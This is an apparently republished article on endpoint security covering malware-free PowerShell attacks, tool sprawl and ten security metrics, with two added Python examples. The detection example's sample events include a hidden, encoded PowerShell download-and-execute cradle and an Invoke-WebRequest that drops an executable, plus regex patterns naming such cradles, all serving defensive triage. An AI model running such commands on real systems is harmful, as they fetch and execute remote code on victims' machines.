Thursday, December 11, 2025

The last line of defence


A constant refrain in the sector is that everything is an endpoint. If it’s connected to the internet, it’s an endpoint. Endpoints need protection and they’re often neglected. While the criminals who broke into the Louvre in broad daylight in October used prosaic methods, it turns out that the museum’s cyber defences were also in need of a dust-off. According to Libération’s investigative unit, the password to the museum’s video surveillance server was “LOUVRE”, while “THALES” got a user into the software platform.

“Today’s attackers aren’t the amateurs of the old days,” says Roy Alves, national sales manager at J2 Software. “They’re adaptive, stealthy operators exploiting the very conveniences we’ve built into our everyday lives.”

Ransomware targeting endpoints has increased, often arriving via unpatched vulnerabilities or phishing lures that AI makes even more convincing. Malware-free attacks, in which adversaries use legitimate tools already present on the host, such as PowerShell (so-called living-off-the-land techniques), are also increasing. Because no malicious file is ever written to disk, they evade traditional signature-based detection.
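The malware-free pattern described above is still detectable without signatures, because what makes a PowerShell invocation suspicious is its context rather than a file hash: which process launched it, whether it hides its window or disables the execution policy, and whether the command (often base64-encoded) carries a download-and-execute primitive. The following is an added example, not code from the article or from any vendor it quotes; the indicator weights, the alert threshold and the sample process-creation events are constructed for illustration and would be tuned against an estate's own baseline of legitimate PowerShell use.

```python
"""Behavioural triage of PowerShell process-creation events.

Added example, not code from the article or any vendor named in it. The
indicator weights, the threshold and the sample events are constructed for
illustration; a production rule set would be tuned against the estate's own
baseline of legitimate PowerShell use.
"""
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand as well as
# the documented short forms -e and -ec, so a detector has to match all of them.
_ENCODED_FLAGS = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}

# An Office application spawning a shell is the classic outcome of a phishing lure.
_OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Download-and-execute primitives ("download cradles"), checked against the raw
# command line and against the decoded payload of any encoded command.
_CRADLE = re.compile(
    r"(?i)(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"
    r"|invoke-expression|\biex\b|frombase64string|start-bitstransfer)"
)
_HIDDEN_WINDOW = re.compile(r"(?i)-w[a-z]*\s+hidden")   # -w / -WindowStyle hidden
_POLICY_BYPASS = re.compile(r"(?i)-e[a-z]*\s+bypass")   # -ep / -ExecutionPolicy bypass
_PUBLIC_DROP = re.compile(r"(?i)C:\\(?:Users\\Public|ProgramData|Windows\\Temp)\\")

# Indicator weights (assumed values): an alert fires once the sum reaches THRESHOLD.
WEIGHTS = {
    "encoded command": 2,
    "office parent": 2,
    "hidden window": 1,
    "execution policy bypass": 1,
    "download/exec primitive": 2,
    "drops file in world-writable path": 1,
}
THRESHOLD = 3


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    tokens = cmd.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag.startswith("-") and flag[1:].lower() in _ENCODED_FLAGS:
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # malformed payload: nothing to inspect further
    return None


def score_event(event: dict) -> dict:
    """Score one process-creation event and list the indicators that fired."""
    cmd = event["cmd"]
    decoded = decode_encoded_command(cmd)
    hits = []
    if decoded is not None:
        hits.append("encoded command")
    if event["parent"].lower() in _OFFICE_PARENTS:
        hits.append("office parent")
    if _HIDDEN_WINDOW.search(cmd):
        hits.append("hidden window")
    if _POLICY_BYPASS.search(cmd):
        hits.append("execution policy bypass")
    haystack = cmd + " " + (decoded or "")   # look inside the decoded payload too
    if _CRADLE.search(haystack):
        hits.append("download/exec primitive")
    if _PUBLIC_DROP.search(haystack):
        hits.append("drops file in world-writable path")
    score = sum(WEIGHTS[h] for h in hits)
    return {"host": event["host"], "score": score, "indicators": hits, "decoded": decoded}


def triage(events: list, threshold: int = THRESHOLD) -> list:
    """Return the scored events that meet the alert threshold, highest score first."""
    scored = [score_event(e) for e in events]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])


# Constructed telemetry in the shape of Sysmon Event ID 1 / Windows 4688 fields.
CRADLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent": "explorer.exe",
     "cmd": "powershell.exe -NoProfile Get-ChildItem C:\\Users"},
    {"host": "WS-014", "parent": "winword.exe",
     "cmd": "powershell.exe -w hidden -nop -ep bypass -enc "
            + base64.b64encode(CRADLE_PAYLOAD.encode("utf-16-le")).decode("ascii")},
    {"host": "SRV-02", "parent": "services.exe",
     "cmd": "powershell.exe -File C:\\ops\\backup.ps1"},
    {"host": "WS-021", "parent": "cmd.exe",
     "cmd": "powershell.exe Invoke-WebRequest http://203.0.113.7/x.exe "
            "-OutFile C:\\Users\\Public\\x.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["host"], finding["score"], ", ".join(finding["indicators"]))
```

The scheduled backup script on SRV-02 and the interactive directory listing on WS-014 score zero, while the Word-spawned, hidden, policy-bypassing encoded command and the plain Invoke-WebRequest drop into a world-writable folder both cross the threshold. Decoding the payload before matching is the step signature-based tools skip, and it is what turns an opaque base64 blob into the readable cradle that justifies the alert.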

“Add in the chaos of BYOD and remote work, where unmanaged devices are increasingly common, and you’ve got a recipe for disaster,” says Alves. “Regular endpoint security isn’t keeping up with how attackers operate today,” says Craig Freer, Qwerti MD. Even though endpoint detection and response (EDR) integrated with threat intelligence is now more common, getting real-time visibility into tactics like supply chain compromises or browser exploits is challenging, says Alves. Many companies are still reactive, patching after the breach rather than predicting with AI-driven behavioural analytics.

“If your endpoint strategy isn’t simulating attacker playbooks or incorporating zero-trust principles, you’re not keeping pace; you’ll always be playing catch-up,” he says.

As new threats present themselves, businesses get sold on buying just one more layer or adding another tool into an already crowded cyber stack. According to the IBM Institute for Business Value, organisations are now juggling on average over 80 security solutions from 29 vendors. “It’s the siren’s song of cybersecurity sales. Stacking tools often turns your security stack into a Frankenstein’s monster – powerful in theory, paralysed in practice,” says Alves, adding that tool sprawl can lead to IT fatigue. When an organisation has overlapping solutions without decommissioning legacy systems, it’s not only complex to manage, but IT administrators may miss important alerts amid all the noise. “Not every alert is a security risk, but they do need to be interrogated,” says Freer. “The volume often means they just get ignored, which defeats the main purpose.”


This results in a complex environment in which both mean time to detect and mean time to respond increase. Alves says technical teams may find themselves drowning in false positives. More tools rarely mean more protection; they breed inefficiency.

Another problem with tool sprawl, says Steve Porter, Metrofile Cloud’s managing director, is that every individual security tool or product may fail at some point. “If you layer the wrong tools, you’re potentially decreasing your security along with your system performance,” he says. He believes the answer lies in planning and measurement. “Start by ensuring comprehensive device coverage. Every endpoint within the organisation should be visible, monitored and protected,” he says. “An effective alerting and monitoring system is essential to flag potential threats early.”


AI is also helping defenders stay ahead by strengthening EDR. Instead of relying on manual log reviews or signature-based alerts, AI can identify suspicious behaviour across thousands of endpoints in seconds, detecting patterns that would otherwise go unnoticed. Ross Saunders, an international cyber speaker, says the increasing use of AI is allowing for deeper and faster analysis of outliers and threats and can pick up trends in logs far quicker than a manual search. Combined with automation, these systems allow security operations teams to concentrate on proactive defence, finding anomalies on individual devices before they spread through the network.

Metrofile’s Porter says visibility and consistency are critical, and measuring effectiveness is just as important as detection. “Technology alone isn’t enough. You need a skilled team to investigate and validate alerts.” He adds that this will help to distinguish genuine threats from false positives while keeping business productivity uninterrupted.

Technology only works if it’s integrated. A good starting point, says Saunders, is to implement a centralised XDR (extended detection and response) so that all devices feed into one dashboard. Isolated installations, he says, don’t offer the same value because they can’t show how different systems interact. Adding network monitoring, intrusion detection and mobile device management builds that picture further, creating a more complete view of the organisation’s health. “Rolling everything into a SIEM and having a security operations centre monitoring it in an aggregate manner gives visibility across the infrastructure, from endpoints to internal networking hardware,” he says.

But even the most unified systems must still contend with the staff using them. Security teams now need to weigh protection against privacy, often making trade-offs that affect both productivity and trust. On company owned devices, controls can be enforced with relative ease. On employee devices, those same safeguards can feel intrusive or overreaching. The challenge is finding an approach that respects both. “Endpoint security isn’t about building taller walls; it’s about smarter sentinels,” says J2’s Alves. “Ditch the tool-hoarding, embrace measurable evolution, and design for humans first. The attackers won’t wait. Why should we?”

TRUTH OR DARE

Metrics are important because they show whether endpoint defences are working or just adding noise. A well-designed measurement strategy links security effort to business performance, translating alerts into evidence. Steve Porter, Metrofile Cloud’s MD, says the process starts with clarity. “Every endpoint within the organisation should be visible, monitored and protected.” From there, it’s about measuring protection, speed, reliability and value, knowing which numbers tell the truth about resilience.

1. Device coverage rate

How many endpoints are actively managed and secured? Gaps in coverage mean hidden risks. Unseen devices are often where breaches begin.

2. Threat-detection accuracy

Measure how effectively your system identifies genuine attacks. The stronger the detection rate, the better your defences understand today’s threat landscape.

3. False-positive burden

Track how many alerts turn out to be harmless. Too much noise blinds teams to real danger and increases fatigue.

4. Response velocity

Assess how quickly your team can detect, contain and recover. Every minute between discovery and action shapes the size of the impact.

5. Patch and hygiene compliance

Out-of-date systems remain the most common entry point. Measuring how consistently endpoints stay patched and configured is basic but vital.

6. Behavioural anomaly visibility

Can you see when devices behave oddly, logging in after hours, connecting to unusual networks or downloading strange files? These patterns often reveal compromised users.

7. Endpoint availability and performance

Security should not slow productivity. Track downtime linked to protection tools and ensure controls safeguard both speed and stability.

8. Tool integration and alert efficiency

Measure how well your endpoint tools talk to each other. Integrated systems reduce alert duplication, cut manual checks and improve response times.

9. User awareness and policy adherence

Even the best technology fails without engaged people. Monitor how often employees follow security practices or trigger policy exceptions.

10. Cost-efficiency and business impact

Calculate the value of prevention. Link spending to incidents avoided, time saved and business continuity maintained. Effective security proves its worth in outcomes, not invoices. 
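The measures above are arithmetic over data most estates already hold: an asset register, agent check-ins, SOC ticket dispositions and patch status. The following is an added example showing how the first five (device coverage, detection precision, false-positive burden, response velocity and patch compliance) fall out of such data; it is not code from the article or from Metrofile, and the inventory, alert queue, reference time, check-in window and patch SLA are constructed assumptions. The design choice worth noting is the denominator: every device discovered on the network counts, so an agentless camera or a laptop whose agent has gone quiet drags coverage and compliance down rather than disappearing from the numbers.

```python
"""Endpoint security metrics computed from asset, alert and patch data.

Added example, not from the article or any vendor it quotes. All inputs are
constructed; NOW, the 24-hour check-in window and the 14-day patch SLA are
assumptions a real programme would replace with its own policy values.
"""
from datetime import datetime, timedelta
from statistics import median

NOW = datetime(2025, 12, 1, 9, 0)          # constructed reference time
CHECKIN_WINDOW = timedelta(hours=24)       # agent silent longer than this = unmanaged
PATCH_SLA_DAYS = 14                        # critical patches must land within this

# Constructed asset register. An entry exists for every device seen on the
# network; the agent fields are None when no agent has ever reported.
ENDPOINTS = [
    {"id": "WS-001", "last_checkin": NOW - timedelta(hours=1),    "critical_patch_age_days": 3},
    {"id": "WS-002", "last_checkin": NOW - timedelta(hours=30),   "critical_patch_age_days": 45},
    {"id": "WS-003", "last_checkin": None,                        "critical_patch_age_days": None},
    {"id": "SRV-01", "last_checkin": NOW - timedelta(minutes=10), "critical_patch_age_days": 0},
    {"id": "CAM-07", "last_checkin": None,                        "critical_patch_age_days": None},
]

# Constructed SOC ticket queue. False positives carry no timestamps because
# nothing was contained.
ALERTS = [
    {"id": 101, "disposition": "true_positive",
     "first_seen": datetime(2025, 12, 1, 8, 0), "detected": datetime(2025, 12, 1, 8, 20),
     "contained": datetime(2025, 12, 1, 9, 5)},
    {"id": 102, "disposition": "false_positive"},
    {"id": 103, "disposition": "true_positive",
     "first_seen": datetime(2025, 12, 1, 6, 30), "detected": datetime(2025, 12, 1, 8, 30),
     "contained": datetime(2025, 12, 1, 8, 50)},
    {"id": 104, "disposition": "false_positive"},
    {"id": 105, "disposition": "false_positive"},
]


def coverage_rate(endpoints, now=NOW, window=CHECKIN_WINDOW) -> float:
    """Share of known devices whose agent checked in inside the window.
    Devices discovered on the network but never managed count against coverage."""
    managed = sum(
        1 for e in endpoints
        if e["last_checkin"] is not None and now - e["last_checkin"] <= window
    )
    return managed / len(endpoints)


def alert_precision(alerts) -> float:
    """Fraction of alerts confirmed genuine; 1 - precision is the false-positive burden."""
    confirmed = sum(1 for a in alerts if a["disposition"] == "true_positive")
    return confirmed / len(alerts)


def response_velocity(alerts) -> dict:
    """Median minutes to detect (first_seen -> detected) and to contain
    (detected -> contained), over confirmed incidents only."""
    def minutes(alert, start, end):
        return (alert[end] - alert[start]).total_seconds() / 60
    incidents = [a for a in alerts if a["disposition"] == "true_positive"]
    return {
        "mttd_minutes": median(minutes(a, "first_seen", "detected") for a in incidents),
        "mttr_minutes": median(minutes(a, "detected", "contained") for a in incidents),
    }


def patch_compliance(endpoints, sla_days=PATCH_SLA_DAYS) -> float:
    """Share of all known devices whose oldest outstanding critical patch is
    within the SLA. Unknown patch state is treated as non-compliant."""
    ok = sum(
        1 for e in endpoints
        if e["critical_patch_age_days"] is not None and e["critical_patch_age_days"] <= sla_days
    )
    return ok / len(endpoints)


def scorecard(endpoints=ENDPOINTS, alerts=ALERTS) -> dict:
    """Assemble the headline numbers an endpoint programme should report."""
    precision = alert_precision(alerts)
    return {
        "coverage_rate": coverage_rate(endpoints),
        "alert_precision": precision,
        "false_positive_burden": 1 - precision,
        **response_velocity(alerts),
        "patch_compliance": patch_compliance(endpoints),
    }


if __name__ == "__main__":
    for name, value in scorecard().items():
        print(f"{name:>22}: {value:.2f}")
```

On the constructed data only two of five devices are both managed and patched within SLA, three of five alerts were noise, and the median two-hour gap between first activity and detection on the confirmed incidents is the number that most directly answers the "response velocity" question above.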

USABILITY, COST AND CONTROL

Endpoint security doesn’t exist in isolation. It underpins the way businesses run – the tools employees use, the systems they depend on and the budgets that keep them going. Every connected device, from laptops and cellphones to servers and surveillance cameras, is an open door if left unguarded. “Too much control chokes productivity; too little invites breaches,” says Roy Alves, from J2 Software.


Getting the balance right means protecting what matters without slowing people down or spending where it doesn’t count.

• Make access invisible: Password-less authentication and risk-based access simplify user login without compromising control. These technologies also reduce the risk of credential theft, which remains a leading cause of endpoint breaches, according to Verizon’s ‘2025 Data Breach Investigations Report’.

• Reduce overlap and fatigue: Security teams often manage dozens of agents doing similar jobs. Consolidating these through unified endpoint management platforms improves system performance, and gives administrators one point of control.

• Spend smarter: Endpoint protection scales best on SaaS models that grow with the business. As a benchmark, analysts recommend endpoint security investment should sit at around 10% to 15% of total IT spend. The rest of the budget goes to training and awareness, tools, licences and good governance.

• Support the people behind the policies: Every layer of security changes how someone works. When controls are communicated clearly and tools are easy to use, employees stop looking for workarounds, and your defences become stronger for it. 



Edited for Kayitsi.com
Author: Kayitsi.com
